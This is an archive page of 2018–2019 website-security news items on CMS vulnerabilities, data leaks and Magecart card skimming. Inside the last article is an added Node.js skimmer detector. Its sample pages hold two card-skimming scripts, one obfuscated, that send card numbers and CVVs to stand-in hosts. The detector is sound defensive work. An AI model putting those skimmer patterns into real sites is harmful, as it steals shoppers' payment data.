Archive for the ‘website security’ Category

Drupal Releases Core CMS Updates to Patch Several Vulnerabilities

April 17th, 2019
Drupal, the popular open-source content management system, has released security updates to address multiple "moderately critical" vulnerabilities in Drupal Core that could allow remote attackers to compromise the security of hundreds of thousands of websites. According to the advisories published today by the Drupal developers, all security vulnerabilities Drupal patched this month reside in

Posted in Cross site scripting, cybersecurity, Drupal, Drupal hacking, hacking news, JQuery, php security, remote code execution, Vulnerability, website security | Comments (0)

Over 100 Million JustDial Users’ Personal Data Found Exposed On the Internet

April 17th, 2019
An unprotected database belonging to JustDial, India's largest local search service, is leaking in real time the personally identifiable information of every customer who accessed the service via its website, mobile app, or even by calling its "88888 88888" customer care number, The Hacker News has learned and independently verified. Founded over two decades ago, JustDial (JD) is the

Posted in API Security, cyber security, data breach, data leaked, Database Security, hacking news, Just dial, mobile api security, server security, unprotected database, website security | Comments (0)

Critical Magento SQL Injection Vulnerability Discovered – Patch Your Sites

March 29th, 2019
If your online e-commerce business runs on the Magento platform, you must pay attention to this information. Magento yesterday released new versions of its content management software to address a total of 37 newly discovered security vulnerabilities. Owned by Adobe since mid-2018, Magento is one of the most popular content management system (CMS) platforms, powering 28% of

Posted in eCommerce Software, hacking news, Magento, Magento Ecommerce Website, Magento Hacking, Magento Vulnerability, SQL injection, Vulnerability, website hacking, website security | Comments (0)

Brace yourselves: exploit published for serious Magento bug allowing card skimming (Updated)

March 28th, 2019

(Image credit: Mighty Travels / Flickr)

Attack code was published on Friday that exploits a critical vulnerability in the Magento e-commerce platform, all but guaranteeing it will be used to plant payment card skimmers on sites that have yet to install a recently released patch.

PRODSECBUG-2198 is a SQL injection vulnerability that attackers can exploit with no authentication required. Attackers could use the flaw to download user names and password hashes and, if they crack the hashes, take control of administrator accounts. From there, they could install backdoors or skimming code of their choice. A researcher at Web security firm Sucuri said Thursday that company researchers reverse-engineered an official patch released Tuesday and created a working proof-of-concept exploit.

Over the past six months, a raft of competing crime gangs has been racing to infect commerce sites with JavaScript that surreptitiously steals purchasers' credit card data. The compromises are the result of exploits against either known or zero-day vulnerabilities. A vulnerability of this severity in an e-commerce platform that boasts 300,000 businesses and merchants is almost certainly going to face in-the-wild attacks by the same card-skimmer gangs.


Posted in Biz & IT, card skimmers, exploits, Magento, vulnerabilities, website security | Comments (0)

New MageCart Attacks Target Bedding Retailers My Pillow and Amerisleep

March 20th, 2019
Cybersecurity researchers today disclosed details of two newly identified Magecart attacks targeting online shoppers of bedding retailers MyPillow and Amerisleep. Magecart is an umbrella term researchers gave to at least 11 different hacking groups that specialize in implanting malicious code on e-commerce websites to silently steal their customers' payment card details.

Posted in banking security, credit card hacking, credit card security, Credit Card Skimmers, Credit card skimming, digital skimmer, magecart, Online Security, website hacking, website security | Comments (0)

New WordPress Flaw Lets Unauthenticated Remote Attackers Hack Sites

March 14th, 2019
If for some reason your WordPress-based website has not yet been automatically updated to the latest version, 5.1.1, it is highly recommended to upgrade it immediately, before hackers can take advantage of a newly disclosed vulnerability to hack your website. Simon Scannell, a researcher at RIPS Technologies GmbH, who previously reported multiple critical vulnerabilities in WordPress, has once

Posted in hack wordpress, hacking news, website security, WordPress, WordPress exploit, Wordpress hacking, WordPress Vulnerability | Comments (0)

F5 Networks Acquires NGINX For $670 Million

March 12th, 2019
NGINX, one of the most important software companies and the one behind the very popular open-source web server of the same name, is being acquired by its rival F5 Networks in a deal valued at about $670 million. While NGINX may not be a name you have ever heard of, the reality is that you use NGINX every day when you post a photo, watch streaming video, purchase goods online, or log

Posted in Apache web server, F5 Networks, Load Balancer, Nginx, reverse proxy, web application firewall, Web Application Security, web hosting, web server, website security | Comments (0)

Hackers Actively Exploiting Latest Drupal RCE Flaw Published Last Week

February 26th, 2019
Cybercriminals have started actively exploiting an already patched security vulnerability in the wild to install cryptocurrency miners on Drupal websites that have not yet applied the patch. Last week, developers of the popular open-source content management system Drupal patched a critical remote code execution (RCE) vulnerability (CVE-2019-6340) in Drupal

Posted in cryptocurrency, cyber security, Drupal, Drupal exploit, drupal hacked, Drupal hacking, hacking news, remote code execution, website security | Comments (0)

DHS Orders U.S. Federal Agencies to Audit DNS Security for Their Domains

January 23rd, 2019
The U.S. Department of Homeland Security (DHS) has today issued an "emergency directive" to all federal agencies ordering IT staff to audit DNS records for their respective website domains, or other agency-managed domains, within the next 10 business days. The emergency security alert came in the wake of a series of recent incidents involving DNS hijacking, which security researchers with "

Posted in certificate authority, certificate transparency, Cyber Attack, DHS, digital Certificate, DNS hijacking, dns security, DNS server, Government, Homeland Security, HTTPS, website security | Comments (0)

E-commerce site is infected not by one, but two card skimmers

November 20th, 2018

(Image credit: Mighty Travels)

Payment card skimming that steals consumers' personal information from e-commerce sites has become a booming industry over the past six months, with high-profile attacks against Ticketmaster, British Airways, Newegg, and Alex Jones' InfoWars, to name just a few. In a sign of the times, security researcher Jérôme Segura found two competing groups going head to head for control of a single vulnerable site.

The site belongs to sportswear seller Umbro Brasil, which as of Tuesday morning was infected by two rival skimmer groups. The first gang planted plaintext JavaScript on the site that caused it to send payment card information to the attackers as customers were completing a sale. The malicious JavaScript looked like this:

A second gang exploited either the same or a different website vulnerability as the first. The second group then installed much more advanced JavaScript that was encoded in a way to prevent other programs from seeing what it did. This is what it looked like:
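The two scripts the article describes are not reproduced on this page. As an added example, not code from the article or from either skimmer gang, the following Node.js script shows the check a defender can run against a page's inline scripts: flag any script that reads payment-form fields, has a way to send data out, and names a host outside the merchant's allowlist. Because the second gang encoded its script, the scanner first peels `\xNN` escapes and base64 literals before matching. The host names, field names and sample pages are constructed assumptions for illustration, not taken from the Umbro Brasil incident.

```javascript
// Added example (not code from the article or from either skimmer gang):
// heuristic scan of a page's inline <script> blocks for the behaviour both
// gangs relied on: reading payment-form fields and sending them to a host
// the merchant does not control. The second gang hid its strings, so the
// scanner first peels \xNN escapes and base64 literals before matching.
// All sample pages and host names below are constructed for illustration.

const PAYMENT_FIELD_RE = /card[_-]?number|cc[_-]?num|cvv|cvc|exp(?:iry|_month|_year|iration)/i;
const EXFIL_SINK_RE = /\b(?:XMLHttpRequest|fetch|sendBeacon|new\s+Image)\b|\.src\s*=/;
const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// Replace \xNN escapes with their characters and decode quoted base64 literals
// that decode to printable text; anything else is left untouched.
function deobfuscate(src) {
  let out = src.replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  out = out.replace(/(["'])([A-Za-z0-9+/]{16,}={0,2})\1/g, (match, _q, b64) => {
    const decoded = Buffer.from(b64, 'base64').toString('utf8');
    return /^[\x20-\x7e\s]+$/.test(decoded) ? JSON.stringify(decoded) : match;
  });
  return out;
}

// Extract the bodies of inline <script> elements, in document order.
function inlineScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const bodies = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    if (m[1].trim()) bodies.push(m[1]);
  }
  return bodies;
}

// A script is flagged only when all three indicators are present: it touches
// payment fields, it has a way to send data out, and that data goes to a host
// outside the merchant's allowlist. Returns one finding per suspicious script.
function scanHtml(html, allowedHosts) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const findings = [];
  inlineScripts(html).forEach((raw, index) => {
    const src = deobfuscate(raw);
    const hosts = [...src.matchAll(URL_RE)].map((m) => m[1].toLowerCase());
    const foreign = [...new Set(hosts.filter((h) => !allowed.has(h)))];
    if (PAYMENT_FIELD_RE.test(src) && EXFIL_SINK_RE.test(src) && foreign.length > 0) {
      findings.push({ script: index, obfuscated: src !== raw, hosts: foreign });
    }
  });
  return findings;
}

// --- Constructed samples (hypothetical hosts, not real sites) ---------------
const ALLOWED_HOSTS = ['shop.example'];

// Plaintext skimmer in the style the article attributes to the first gang.
const PLAIN_SKIMMER_PAGE = `<html><body>
<script>var cart = {};</script>
<script>
document.querySelector('#checkout').addEventListener('submit', function () {
  var d = { n: document.getElementById('card_number').value,
            c: document.getElementById('cvv').value };
  new Image().src = 'https://stats-collect.example/i.gif?d=' + btoa(JSON.stringify(d));
});
</script></body></html>`;

// Encoded skimmer: field names as \xNN escapes, exfil URL as base64.
const B64_URL = Buffer.from('https://cdn-assets.example/x.php').toString('base64');
const ENCODED_SKIMMER_PAGE = String.raw`<html><body><script>
(function(){var f=['\x63\x61\x72\x64\x5f\x6e\x75\x6d\x62\x65\x72','\x63\x76\x76'];
var u=atob('${B64_URL}');
window.addEventListener('beforeunload',function(){var p={};
f.forEach(function(k){p[k]=document.getElementById(k).value});
fetch(u,{method:'POST',body:JSON.stringify(p)});});})();
</script></body></html>`;

// Legitimate checkout script: touches card fields but posts to the shop itself.
const BENIGN_PAGE = `<html><body><script>
document.getElementById('pay').onclick = function () {
  fetch('https://shop.example/api/pay', { method: 'POST',
    body: JSON.stringify({ card_number: document.getElementById('card_number').value }) });
};
</script></body></html>`;

console.log(JSON.stringify({
  plain: scanHtml(PLAIN_SKIMMER_PAGE, ALLOWED_HOSTS),
  encoded: scanHtml(ENCODED_SKIMMER_PAGE, ALLOWED_HOSTS),
  benign: scanHtml(BENIGN_PAGE, ALLOWED_HOSTS),
}, null, 2));
```

Run it with `node`; the three constructed pages exercise the plaintext skimmer, the encoded one, and a legitimate checkout script that posts card data only to the shop's own host. A heuristic like this catches the common case only: a skimmer that exfiltrates to a host on the allowlist (for instance a compromised first-party CDN) or that assembles its URL at runtime will not be flagged, so it complements, rather than replaces, file-integrity monitoring on the web root and a Content Security Policy that restricts connect-src and img-src.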


Posted in Biz & IT, card skimmers, magecart, website security | Comments (0)